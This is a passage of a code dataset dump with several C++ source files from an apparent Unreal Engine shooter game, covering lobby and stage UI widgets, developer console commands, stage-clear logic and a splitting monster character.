pGameModeMainLobby);\n\n\tABCHECK(pGameModeMainLobby->SetNextStageID());\n\tUpdateLayoutStage();\n\tUpdateLayoutMission();\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnSelectStagePrev()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\tABCHECK(pGameModeMainLobby->SetPrevStageID());\n\tUpdateLayoutStage();\n\tUpdateLayoutMission();\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnGameStart()\n{\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase);\n\n\tif (pGameModeBase->StartGame())\n\t{\n\t\tGetWorld()->GetGameViewport()->RemoveAllViewportWidgets();\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnShop()\n{\n\tauto GameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != GameInstance);\n\n\tif (nullptr == m_pWBShop)\n\t{\n\t\tm_pWBShop = CreateWidget<UPG_UserWidgetScreenShop>(this, WB_ShopClass);\n\t\tABCHECK(nullptr != m_pWBShop);\n\t}\n\n\tGetWorld()->GetGameViewport()->RemoveAllViewportWidgets();\n\tm_pWBShop->AddToViewport();\n\tm_pWBShop->Init();\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnOpenWeaponInventory(int32 nSlotIndex)\n{\n\tABCHECK(nullptr != m_pkWB_WeaponInventory);\n\n\t// 첫번째 인벤토리는 기본 라이플 무기를 사용해야 하므로 수정 못하도록 한다. \n\tif (0 == nSlotIndex)\n\t\treturn;\n\n\t// 인벤토리 창을 연다.\n\tm_pkScaleWeaponInventory->SetVisibility(ESlateVisibility::Visible);\n\tm_pkWB_WeaponInventory->SetOpenSlotIndex(nSlotIndex);\n\tm_pkWB_WeaponInventory->SetVisibility(ESlateVisibility::Visible);\n\tm_pkWB_WeaponInventory->UpdateWeaponInventory();\n\n\tm_pkWB_WeaponBox[nSlotIndex]->SetEnableLightBox(true);\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnCloseWeaponInventory(int32 nSlotIndex, int32 nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pkWB_WeaponInventory);\n\n\t// 인벤토리 창이 닫힘\n\tm_pkScaleWeaponInventory->SetVisibility(ESlateVisibility::Hidden);\n\tm_pkWB_WeaponBox[nSlotIndex]->SetEnableLightBox(false);\n\tif (PG_INVALID_INDEX != nWeaponIndex)\n\t{\n\t\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeMainLobby);\n\t\tpGameModeMainLobby->SaveWeaponEquipSlot(nSlotIndex, nWeaponIndex);\n\n\t\tUpdateLayoutWeaponSlot();\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnDoNotChangeCloseWeaponInventory()\n{\n\tABCHECK(nullptr != m_pkWB_WeaponInventory);\n\n\t// 인벤토리 창이 닫힘\n\tm_pkScaleWeaponInventory->SetVisibility(ESlateVisibility::Hidden);\n\tm_pkWB_WeaponInventory->SetVisibility(ESlateVisibility::Hidden);\n\n\tfor (auto WeaponBox : m_pkWB_WeaponBox)\n\t{\n\t\tif (WeaponBox)\n\t\t\tWeaponBox->SetEnableLightBox(false);\n\t}\n}" }, { "alpha_fraction": 0.6402701139450073, "alphanum_fraction": 0.6464088559150696, "avg_line_length": 26.610170364379883, "blob_id": "e8ba7ce8bb139931ae8c21bd99a268bf1c023467", "content_id": "a413a8a58942c2d28866e24bb9be7c30d11051b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1631, "license_type": "no_license", "max_line_length": 79, "num_lines": 59, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetStageClearTarget.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetStageClearTarget.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetStageClearTarget : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tvoid SetDataFlag(bool bClear, int32 nCurrValue, int32 nMaxValue);\n\tvoid SetDataLethal(bool bClear, int32 nCurrValue, int32 nMaxValue);\n\tvoid SetDataTime(bool bClear, int32 nCurrTime);\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\t\n\t//==============================================\n\t// Flag\n\t//==============================================\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* Flag_Clear;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* Flag_InProgress;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_CurrFlag;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_MaxFlag;\n\n\t//==============================================\n\t// Lethal\n\t//==============================================\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* Lethal_Clear;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* Lethal_InProgress;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_CurrLethal;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_MaxLethal;\n\n\t//==============================================\n\t// Time\n\t//==============================================\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* Time_Clear;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* Time_InProgress;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_CurrTime;\n};\n" }, { "alpha_fraction": 0.7372727394104004, "alphanum_fraction": 0.7372727394104004, "avg_line_length": 22.4255313873291, "blob_id": "c1e364182d5d3cb86db4610d1fc38b6dda409d9f", "content_id": "0360acfbdd024a0a63ea7d4dad80467cd2a512f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1102, "license_type": "no_license", "max_line_length": 116, "num_lines": 47, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandStartStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/Console/Commands/PG_CommandStartStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\nPG_CommandStartStage::PG_CommandStartStage()\n{\n}\n\nPG_CommandStartStage::~PG_CommandStartStage()\n{\n}\n\nvoid PG_CommandStartStage::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandStartStage::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tauto pGameMdoe = Cast<APG_GameModeBase>(G_PGWorld->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMdoe);\n\n\t//auto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\t//ABCHECK(nullptr != pGameInstance);\n\n\tif (false == pGameMdoe->SetPlayStageID(m_pConsoleVariable->GetInt()))\n\t{\n\t\tABLOG(Warning, TEXT(\"There is no corresponding stage information. (StageID ; %d)\"), m_pConsoleVariable->GetInt());\n\t}\n\n\tpGameMdoe->StartGame();\n}\n\nvoid PG_CommandStartStage::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.7899065613746643, "alphanum_fraction": 0.7977570295333862, "avg_line_length": 30.11627960205078, "blob_id": "516cfaad82c0cf2b3f5065de4440d11c40011353", "content_id": "45c39274cef24df3d5ff08a860f0324f95f0f32c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2685, "license_type": "no_license", "max_line_length": 129, "num_lines": 86, "path": "/Source/Project_Gun/Private/Character/PG_MonCharDivision.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharDivision.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/Component/PG_ComponentDivisionSpawn.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\nAPG_MonCharDivision::APG_MonCharDivision()\n{\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n\tDivisionSpawnComponent = CreateDefaultSubobject<UPG_ComponentDivisionSpawn>(TEXT(\"COMPONENTDIVISIONSPAWN\"));\n\tm_bIsDivisionChild = false;\n}\n\nvoid APG_MonCharDivision::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_MonCharDivision::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterDivisionData.MRemainDivisionCount = MonsterDivisionData.MDivisionCount;\n\tMonsterData = &MonsterDivisionData;\n}\n\nint32 APG_MonCharDivision::GetDivisionCountToHPRatio()\n{\n\tif (MonsterDivisionData.MRemainDivisionCount <= 0 || 0.0f >= GetHPRatio())\n\t\treturn 0;\n\n\tfloat fActiveHPRatio = 1.0f / (MonsterDivisionData.MDivisionCount + 1);\n\treturn (int32)(GetHPRatio() / fActiveHPRatio);\n}\n\nbool APG_MonCharDivision::IsPossibleToDivision()\n{\n\tif (0 >= MonsterDivisionData.MRemainDivisionCount || 0 >= MonsterDivisionData.MDivisionCount)\n\t\treturn false;\n\n\t// 분열 대역\n\tfloat fPossibleToDivions_HPRatio = (1.0f / (MonsterDivisionData.MDivisionCount + 1)) * MonsterDivisionData.MRemainDivisionCount;\n\treturn (GetHPRatio() < fPossibleToDivions_HPRatio);\n}\n\nbool APG_MonCharDivision::IsDivisionChild()\n{\n\treturn m_bIsDivisionChild;\n}\n\nvoid APG_MonCharDivision::SetMonsterDataDivision(FPGMonsterData_Division& MonsterData_Division)\n{\n\tMonsterDivisionData = MonsterData_Division;\n}\n\nbool APG_MonCharDivision::OnDamage(int32 nDamage, bool IsUseLetharAttack)\n{\n\tbool bIsDie = Super::OnDamage(nDamage, IsUseLetharAttack);\n\n\tif (false == bIsDie && IsPossibleToDivision())\n\t{\n\t\tif (0 < MonsterDivisionData.MRemainDivisionCount)\n\t\t{\n\t\t\tFVector vRange(MonsterDivisionData.MDivisionSpawnRange, MonsterDivisionData.MDivisionSpawnRange, 0.0f);\n\t\t\tif (DivisionSpawnComponent)\n\t\t\t\tDivisionSpawnComponent->DivisionSpawnActor<APG_MonCharDivision>(MonsterDivisionData.MDivisionAmount, vRange);\n\t\t}\n\n\t\tMonsterDivisionData.MRemainDivisionCount = GetDivisionCountToHPRatio();\n\t}\n\n\treturn bIsDie;\n}\n\nvoid APG_MonCharDivision::OnSpawnActor(APG_MonCharDivision* ASpawnActor)\n{\n\tABCHECK(nullptr != ASpawnActor);\n\n\tFPGMonsterData_Division MakeMonsterData_Division = MonsterDivisionData;\n\tMakeMonsterData_Division.MRemainDivisionCount = GetDivisionCountToHPRatio();\n\tASpawnActor->m_bIsDivisionChild = true;\n\tASpawnActor->SetMonsterDataDivision(MakeMonsterData_Division);\n\tASpawnActor->SetHP(MakeMonsterData_Division.MHP);\n}" }, { "alpha_fraction": 0.6073758006095886, "alphanum_fraction": 0.6093828678131104, "avg_line_length": 30.140625, "blob_id": "b643782f01ae8c240f77074deaedeb9cf5c7ff79", "content_id": "0814d4852579644f8d41bff64557c27591fdb812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3988, "license_type": "no_license", "max_line_length": 122, "num_lines": 128, "path": "/Source/Project_Gun/Private/Game/Console/PG_Console.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/Console/PG_Console.h\"\n#include \"Game/Console/Commands/PG_Command.h\"\n#include \"Game/Console/Commands/PG_CommandAllStageUnlock.h\"\n#include \"Game/Console/Commands/PG_CommandNextStage.h\"\n#include \"Game/Console/Commands/PG_CommandPrevStage.h\"\n#include \"Game/Console/Commands/PG_CommandRestartStage.h\"\n#include \"Game/Console/Commands/PG_CommandSetTargetStageID.h\"\n#include \"Game/Console/Commands/PG_CommandShowMeTheMoney.h\"\n#include \"Game/Console/Commands/PG_CommandStartStage.h\"\n\n#include <Core\\Public\\HAL\\IConsoleManager.h>\n\nPG_Console::PG_Console()\n{\n}\n\nPG_Console::~PG_Console()\n{\n ReleaseCommands();\n}\n\nvoid PG_Console::CreateCommands()\n{\n#define CREATE_CONSOLEVARIABLE(CommandName, DefaultValue, Help, Flags) \\\n IConsoleManager::Get().RegisterConsoleVariable(CommandName, \\\n DefaultValue, \\\n Help, \\\n Flags)\\\n\n#define ADD_COMMAND(index, CommandName, ClassName, DefaultValue, Help, Flags) \\\n m_kCommands[index] = new ClassName(); \\\n m_kCommands[index]->Init(CREATE_CONSOLEVARIABLE(CommandName, DefaultValue, Help, Flags)) \\\n\n //====================================================================================================================\n // Create Commands\n //====================================================================================================================\n ADD_COMMAND(eCC_SET_TARGET_STAGE_ID, TEXT(\"PG.SetTargetStageID\"), PG_CommandSetTargetStageID,\n 1,\n TEXT(\"Changes to the stage ID value at the level you are currently playing.\\n\")\n TEXT(\"(After the change, clear the stage, or start with the changed stage value when restarting.).\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_RESTART_STAGE, TEXT(\"PG.RestartStage\"), PG_CommandRestartStage,\n 1,\n TEXT(\"Restart the current stage.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_NEXT_STAGE, TEXT(\"PG.NextStage\"), PG_CommandNextStage,\n 1,\n TEXT(\"Start the next stage.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_PREV_STAGE, TEXT(\"PG.PrevStage\"), PG_CommandPrevStage,\n 1,\n TEXT(\"Start the previous stage.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_START_STAGE, TEXT(\"PG.StartStage\"), PG_CommandStartStage,\n 1,\n TEXT(\"Start the input stage.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_SHOW_ME_THE_MONEY, TEXT(\"PG.ShowMeTheMoney\"), PG_CommandShowMeTheMoney,\n 1,\n TEXT(\"Set Reward Point.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_ALL_STAGE_UNLOCK, TEXT(\"PG.AllStageUnlock\"), PG_CommandAllStageUnlock,\n 1,\n TEXT(\"1 : All Stage Unlock..\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe); \n\n //====================================================================================================================\n\n#undef ADD_COMMAND\n#undef CREATE_CONSOLEVARIABLE\n}\n\nbool PG_Console::InitConsoleCommands()\n{\n m_kCommands.Init(nullptr, eCC_Max);\n\n CreateCommands();\n\n\treturn true;\n}\n\nvoid PG_Console::ReleaseCommands()\n{\n for (auto command : m_kCommands)\n {\n if (command)\n {\n IConsoleManager::Get().UnregisterConsoleObject(command->GetConsoleVariable());\n delete command;\n command = nullptr;\n }\n }\n\n m_kCommands.Reset();\n}\n\nPG_Command* PG_Console::GetCommand(class IConsoleVariable* pConsoleVariable)\n{\n for (auto command : m_kCommands)\n {\n if (nullptr == command)\n continue;\n\n if (command->GetConsoleVariable() == pConsoleVariable)\n return command;\n }\n\n return nullptr;\n}\n\nvoid PG_Console::UpdateCommands()\n{\n for (auto command : m_kCommands)\n {\n if (nullptr == command)\n continue;\n\n command->UpdateCommand();\n }\n}\n" }, { "alpha_fraction": 0.7844564318656921, "alphanum_fraction": 0.7846912145614624, "avg_line_length": 31.51908302307129, "blob_id": "3c2920c005f47f9b38645cefb8647ba838812f18", "content_id": "831936be1ae88458184d4a62417accba70d0a154", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4373, "license_type": "no_license", "max_line_length": 104, "num_lines": 131, "path": "/Source/Project_Gun/Private/Game/GameMode/PG_GameModeStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"SaveData/PG_SaveStageData.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\nAPG_GameModeStage::APG_GameModeStage()\n{\n\tDefaultPawnClass = APG_MyChar::StaticClass();\n\tPlayerControllerClass = APG_PlayerController::StaticClass();\n\tGameStateClass = APG_GameStateStage::StaticClass();\n\tPlayerStateClass = APG_MyPlayerState::StaticClass();\n}\n\nvoid APG_GameModeStage::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_GameModeStage::PostLogin(APlayerController* NewPlayer)\n{\n\tSuper::PostLogin(NewPlayer);\n}\n\nvoid APG_GameModeStage::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\n\nbool APG_GameModeStage::IsClearMission(enum EStageClearType a_ekStageClearType)\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tconst FPGStageData*\tcpStageData = pGameInstance->GetTableStageData(m_pSelectSaveStageData->m_nStageID);\n\tABCHECK(nullptr != cpStageData, false);\n\n\tswitch (a_ekStageClearType)\n\t{\n\tcase EStageClearType::eSCT_AmountKill:\n\t\treturn (pGameStateStage->GetStagePlayData()->NumberOfMonstersKilled >= cpStageData->M_Amount);\n\tcase EStageClearType::eSCT_ClearTime:\n\t\treturn (IsClearMission(EStageClearType::eSCT_Lethal) && (pGameStateStage->GetRemainStageTimer() > 0));\n\tcase EStageClearType::eSCT_Lethal:\n\t\treturn (pGameStateStage->GetMaxLethalKill() >= cpStageData->Multi_Kill);\n\t}\n\n\tABLOG(Error, TEXT(\"Can't find MisiionType\"));\n\treturn false;\n}\n\nbool APG_GameModeStage::IsWasClearMisiion(enum EStageClearType a_ekStageClearType)\n{\n\tABCHECK(nullptr != m_pSelectSaveStageData, false);\n\n\tswitch (a_ekStageClearType)\n\t{\n\tcase EStageClearType::eSCT_AmountKill:\n\t\treturn m_pSelectSaveStageData->m_bWasClearAmount;\n\tcase EStageClearType::eSCT_ClearTime:\n\t\treturn m_pSelectSaveStageData->m_bWasClearTime;\n\tcase EStageClearType::eSCT_Lethal:\n\t\treturn m_pSelectSaveStageData->m_bWasClearLethal;\n\t}\n\n\tABLOG(Error, TEXT(\"Can't find MisiionType\"));\n\treturn false;\n}\n\nbool APG_GameModeStage::IsStageClear()\n{\n\t// 모든 몬스터를 죽여야 스테이지 클리어 가능하다.\n\t// 필살기 킬수나 제한시간은 부수적인 스테이지 클리어 조건이기 때문에 검사하지 않는다.\n\treturn IsClearMission(EStageClearType::eSCT_AmountKill);\n}\n\nbool APG_GameModeStage::SavePlayerData()\n{\n\tauto pPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pPlayerState, false);\n\n\tABCHECK(SetSavePlayerData(*pPlayerState->GetPlayingPlayerData()), false);\n\n\treturn APG_GameModeBase::SavePlayerData();\n}\n\nbool APG_GameModeStage::SaveStageData()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage, false);\n\n\tABCHECK(SetSaveStageData(*pGameStateStage->GetStagePlayData()), false);\n\n\treturn APG_GameModeBase::SaveStageData();\n}\n\nbool APG_GameModeStage::SetSavePlayerData(const struct FPGPlayerData& a_rkPlayerData)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tm_pSavePlayerData->m_nRewardPoint = a_rkPlayerData.RewardPoint;\n\t//m_pSavePlayerData->m_nEquipWeaponSlotIndex = a_rkPlayerData.EquipWeaponInventoryIndex;\n\t//m_pSavePlayerData->m_kEquipWeaponClass = a_rkPlayerData.EquipWeaponClass;\n\n\treturn true;\n}\n\nbool APG_GameModeStage::SetSaveStageData(const FPGStagePlayData& a_rkStagePlayData)\n{\n\tABCHECK(nullptr != m_pSelectSaveStageData, false);\n\tm_pSelectSaveStageData->m_kStagePlayData = a_rkStagePlayData;\n\n\tif (false == m_pSelectSaveStageData->m_bWasClearAmount)\n\t\tm_pSelectSaveStageData->m_bWasClearAmount = IsClearMission(EStageClearType::eSCT_AmountKill);\n\n\tif (false == m_pSelectSaveStageData->m_bWasClearTime)\n\t\tm_pSelectSaveStageData->m_bWasClearTime = IsClearMission(EStageClearType::eSCT_ClearTime);\n\n\tif (false == m_pSelectSaveStageData->m_bWasClearLethal)\n\t\tm_pSelectSaveStageData->m_bWasClearLethal = IsClearMission(EStageClearType::eSCT_Lethal);\n\n\treturn true;\n}" }, { "alpha_fraction": 0.7776365876197815, "alphanum_fraction": 0.7852604985237122, "avg_line_length": 32.56398010253906, "blob_id": "cfe7a130b6c050d831f996cd533e9152b745fe18", "content_id": "98f315626fc8b97b98b7e8f26a90ec65d2824174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7093, "license_type": "no_license", "max_line_length": 124, "num_lines": 211, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetPlayStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetPlayStage.h\"\n#include \"UI/PG_UserWidgetStageClearTarget.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <Components/Overlay.h>\n\nvoid UPG_UserWidgetPlayStage::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != WB_StageClearTarget);\n\tABCHECK(nullptr != WB_WeaponBox_0);\n\tABCHECK(nullptr != WB_WeaponBox_1);\n\tABCHECK(nullptr != WB_WeaponBox_2);\n\tABCHECK(nullptr != SelectWeapon_0);\n\tABCHECK(nullptr != SelectWeapon_1);\n\tABCHECK(nullptr != SelectWeapon_2);\n\n\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tif (MyPlayerState)\n\t{\n\t\tMyPlayerState->OnUpdateRewardPoint.AddUObject(this, &UPG_UserWidgetPlayStage::OnChangeRewardPoint);\n\t}\n\n\tauto GameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (GameStateStage)\n\t{\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayStage::OnUpdateFlag);\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayStage::OnUpdateLethal);\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayStage::OnUpdateTime);\n\t}\n\n\tWB_WeaponBox_0->SetSlotIndex(0);\n\tWB_WeaponBox_0->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetPlayStage::OnChangeEquipWeaponIndex);\n\tWB_WeaponBox_1->SetSlotIndex(1);\n\tWB_WeaponBox_1->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetPlayStage::OnChangeEquipWeaponIndex);\n\tWB_WeaponBox_2->SetSlotIndex(2);\n\tWB_WeaponBox_2->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetPlayStage::OnChangeEquipWeaponIndex);\n}\n\nvoid UPG_UserWidgetPlayStage::InitWeaponBoxData()\n{\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tauto pMyPlayerData = pMyPlayerState->GetPlayingPlayerData();\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode);\n\n\tfor (int32 nSlotIndex = 0; nSlotIndex < pMyPlayerData->PlayerWeaponInventory.Num(); ++nSlotIndex)\n\t{\n\t\tint32 nAmmo = pGameMode->GetMaxAmmo(pMyPlayerData->PlayerWeaponInventory[nSlotIndex]);\n\t\tif (nSlotIndex == PG_MAX_WEAPON_SLOT - 1)\n\t\t{\n\t\t\t// 유료 슬롯\n\t\t\tInitWeaponBoxData(pMyPlayerData->bExtendWeaponSlot, nSlotIndex, pMyPlayerData->PlayerWeaponInventory[nSlotIndex], nAmmo);\n\t\t}\n\t\telse\n\t\t{\n\t\t\tInitWeaponBoxData(true, nSlotIndex, pMyPlayerData->PlayerWeaponInventory[nSlotIndex], nAmmo);\n\t\t}\n\t}\n\n\tSetSelectWeapon(pMyPlayerData->EquipWeaponInventoryIndex);\n\n\tOnUpdateFlag();\n\tOnUpdateLethal();\n\tOnUpdateTime();\n\tOnChangeRewardPoint();\n}\n\nbool UPG_UserWidgetPlayStage::InitWeaponBoxData(bool bEnable, int32 nSlotIndex, int32 nWeaponTableIndex, int32 nAmmo)\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage, false);\n\n\tauto pUserWidgetWeaponBox = GetUserWidgetWeaponBox(nSlotIndex);\n\tABCHECK(nullptr != pUserWidgetWeaponBox, false);\n\n\tpUserWidgetWeaponBox->SetWeaponIndex(pGameModeStage, nWeaponTableIndex);\n\tpUserWidgetWeaponBox->SetAmmo(nAmmo);\n\tpUserWidgetWeaponBox->SetEnable(bEnable);\n\n\treturn true;\n}\n\nvoid UPG_UserWidgetPlayStage::SetSelectWeapon(int32 nSlotIndex)\n{\n\tfor (int32 nIndex = 0; nIndex < eMaxWeaponSlotIndex; ++nIndex)\n\t{\n\t\tauto pOverlaySelectWeapon = GetOverlaySelectWeapon(nIndex);\n\t\tif (pOverlaySelectWeapon)\n\t\t{\n\t\t\tbool bSelect = (nIndex == nSlotIndex);\n\t\t\tif (bSelect)\n\t\t\t\tpOverlaySelectWeapon->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\telse\n\t\t\t\tpOverlaySelectWeapon->SetVisibility(ESlateVisibility::Hidden);\n\t\t}\n\t}\n}\n\nvoid UPG_UserWidgetPlayStage::OnUpdateWeaponAmmo(int32 nSlotIndex, int32 nAmmo)\n{\n\tauto pUserWidgetWeaponBox = GetUserWidgetWeaponBox(nSlotIndex);\n\tABCHECK(nullptr != pUserWidgetWeaponBox);\n\n\tpUserWidgetWeaponBox->SetAmmo(nAmmo);\n}\n\nvoid UPG_UserWidgetPlayStage::OnChangeEquipWeaponIndex(int32 nSlotIndex)\n{\n\tauto pUserWidgetWeaponBox = GetUserWidgetWeaponBox(nSlotIndex);\n\tABCHECK(nullptr != pUserWidgetWeaponBox);\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tif (pMyPlayerState->ChangeWeapon(nSlotIndex, pUserWidgetWeaponBox->GetWeaponIndex()))\n\t{\n\t\tSetSelectWeapon(nSlotIndex);\n\t}\n}\n\nvoid UPG_UserWidgetPlayStage::OnUpdateFlag()\n{\n\tABCHECK(nullptr != WB_StageClearTarget);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\t\n\tWB_StageClearTarget->SetDataFlag(pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill), \n\t\tpStagePlayData->NumberOfMonstersKilled, \n\t\tpStagePlayData->NumberOfMonsters);\n}\n\nvoid UPG_UserWidgetPlayStage::OnUpdateLethal()\n{\n\tABCHECK(nullptr != WB_StageClearTarget);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tWB_StageClearTarget->SetDataLethal(pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal), \n\t\tpStagePlayData->NumberOfMonstersMuiltiKilled, 